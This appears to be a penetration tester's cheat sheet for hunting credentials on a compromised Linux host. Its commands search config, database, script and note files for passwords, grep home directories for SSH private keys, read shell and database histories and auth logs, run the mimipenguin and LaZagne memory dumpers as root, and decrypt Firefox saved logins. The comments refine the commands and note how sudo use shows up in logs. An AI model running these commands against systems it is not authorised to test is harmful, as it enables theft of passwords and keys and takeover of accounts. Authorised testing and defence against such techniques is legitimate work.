Credential Hunting
# Files / Configs
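## List every config-style file on the box (.conf / .config / .cnf), pruning common noise dirs.
## The find pattern is quoted: unquoted `*$l` let the shell glob it against the CWD first, so a
## stray foo.conf in the working directory turned the search into `find / -name foo.conf`.
## NOTE: `grep -v lib` also drops legitimate paths containing "lib" (e.g. /etc/libvirt) — widen if needed.
for ext in .conf .config .cnf; do printf '\nFile extension: %s\n' "$ext"; find / -name "*$ext" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done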
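## Grep the .cnf files found above for credential-looking lines.
## Fixes: quoted glob; files streamed through `read -r` instead of word-splitting `$(find …)`
## (paths with spaces broke); -i so `Password=` / `USER=` are caught; and only lines that START
## with '#' are dropped — the old `grep -v "#"` also hid real values such as `password=abc#1`.
find / -name "*.cnf" -type f 2>/dev/null | grep -v "doc\|lib" | while IFS= read -r f; do printf '\nFile: %s\n' "$f"; grep -i "user\|password\|pass" "$f" 2>/dev/null | grep -v "^[[:space:]]*#"; done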
# Files / Databases
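# Database files (.sql, .db, anything ending in "db", anything starting ".db").
# Both the list entries and the find pattern are quoted: `.*db` / `.db*` are glob characters,
# and unquoted they expanded against the CWD (in the for-list AND in `-name *$l`) before find ran.
# NOTE: the wildcard entries are broad (.pdb, .dbus, …); the grep -v list only prunes common noise.
for ext in .sql .db '.*db' '.db*'; do printf '\nDB File extension: %s\n' "$ext"; find / -name "*$ext" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done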
# Files / Notes
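# Note-like files in home directories: *.txt plus any regular file without an extension.
# Fix: `-type f -name "*.txt" -o ! -name "*.*"` parsed as (-type f -a -name "*.txt") -o (! -name "*.*"),
# so the second alternative ignored -type f and listed every dot-less directory as well.
# Parentheses make -type f apply to both alternatives; stderr is silenced for unreadable homes.
find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null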
# Files / Scripts
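# Script / source files that may embed credentials (.py .pyc .pl .go .jar .c .sh).
# The find pattern is quoted so a matching file in the CWD cannot be globbed into the argument
# (unquoted `*$l` with a local foo.py became `find / -name foo.py`).
for ext in .py .pyc .pl .go .jar .c .sh; do printf '\nFile extension: %s\n' "$ext"; find / -name "*$ext" 2>/dev/null | grep -v "doc\|lib\|headers\|share"; done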
# Files / Source codes
# Files / Cronjobs
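# System-wide cron: /etc/crontab plus the /etc/cron.{d,hourly,daily,weekly,monthly} drop-ins.
cat /etc/crontab
ls -la /etc/cron.*/
# Per-user crontabs live in the spool (/var/spool/cron on RHEL-style, /var/spool/cron/crontabs
# on Debian-style) and are normally root-only — errors are silenced rather than hidden by a
# missing listing. anacron has its own table, and systemd timers are not cron at all.
ls -la /var/spool/cron/ /var/spool/cron/crontabs/ 2>/dev/null
cat /etc/anacrontab 2>/dev/null
systemctl list-timers --all 2>/dev/null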
# Files / SSH Keys
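## Private keys: match the PEM BEGIN header on any line. The old `| grep ":1"` was meant to keep
## line 1 only, but it also matched line 10/11/100… and, worse, missed keys pasted into the middle
## of a notes file. Matching "BEGIN …PRIVATE KEY" avoids the duplicate END line, and -n prints just
## the header line, never the key material itself.
grep -rnw "BEGIN .*PRIVATE KEY" /home/ 2>/dev/null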
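## Public keys / authorized_keys. Covers ed25519, ecdsa, dss and FIDO (sk-*) key types, not only
## ssh-rsa, and reports every line: the old `| grep ":1"` dropped the 2nd+ entry of an
## authorized_keys file, i.e. exactly the extra keys that grant someone else access.
grep -rnwE "ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp[0-9]+|sk-(ssh-ed25519|ecdsa-sha2-nistp256)@openssh\.com" /home/ 2>/dev/null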
# History / Command-line History
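# Last lines of shell and tool histories for every user. `.bash*` is kept on purpose: besides
# .bash_history it covers .bashrc/.bash_profile, which may `export` tokens. zsh, python, mysql
# and psql keep their own history files, which the original pattern never looked at.
# Bump -n (or drop tail) to read a whole history; errors from unreadable homes are silenced.
tail -n5 /home/*/.bash* /home/*/.zsh_history /home/*/.python_history /home/*/.mysql_history /home/*/.psql_history 2>/dev/null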
# History / Logs
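# Grep every readable log under /var/log for auth, sudo and user-management events.
# Fixes vs. the original: no `ls` parsing (`ls /var/log/*` also emitted "dir:" headers and split
# on whitespace), the pattern is defined once instead of typed twice, subdirectories are walked,
# and -I skips binary logs (wtmp/btmp/journal) instead of printing "Binary file … matches".
# -readable is GNU find. Rotated *.gz logs are still skipped — use zgrep for those; for the
# systemd journal use journalctl. Note that COMMAND= lines are sudo's own audit trail: anything
# run via sudo during the engagement shows up here too.
pat="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs"
find /var/log -type f -readable 2>/dev/null | while IFS= read -r f; do if grep -qI "$pat" "$f" 2>/dev/null; then printf '\n#### Log file: %s\n' "$f"; grep -I "$pat" "$f" 2>/dev/null; fi; done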
# Memory / Cache
# Memory / cache credential dumpers. Both are run under sudo, i.e. they need root, and they are
# invoked from the CWD — presumably they have to be dropped onto the target first (not part of the
# base system). NOTE(review): every sudo invocation typically writes a "COMMAND=…" line to the auth
# log, which is one of the very patterns the log grep in this sheet searches for; weigh that on an
# engagement where noise matters.
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh
# laZagne "all" runs every module. The python2.7 pin looks dated — presumably current releases
# run under python3; verify against the project before relying on this line.
sudo python2.7 laZagne.py all
# Memory / In-memory Processing
# Key-Rings / Browser stored credentials
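# Firefox saved logins. Profile directory names carry a random prefix (the original hard-coded
# one such name, 1bplpd86.default-release, which exists on exactly one machine), so glob for
# every *default* profile instead; paths are anchored on $HOME so this works from any CWD.
ls -ld ~/.mozilla/firefox/*default*/ 2>/dev/null
for p in ~/.mozilla/firefox/*default*/; do [ -f "$p/logins.json" ] || continue; printf '\n#### Profile: %s\n' "$p"; jq . "$p/logins.json"; done
# logins.json holds the entries in encrypted form — hence the separate decrypt step below.
# firefox_decrypt presumably needs the profile's key database next to logins.json; check the
# project README for the exact files and the supported python3 versions.
python3 firefox_decrypt.py # https://github.com/unode/firefox_decrypt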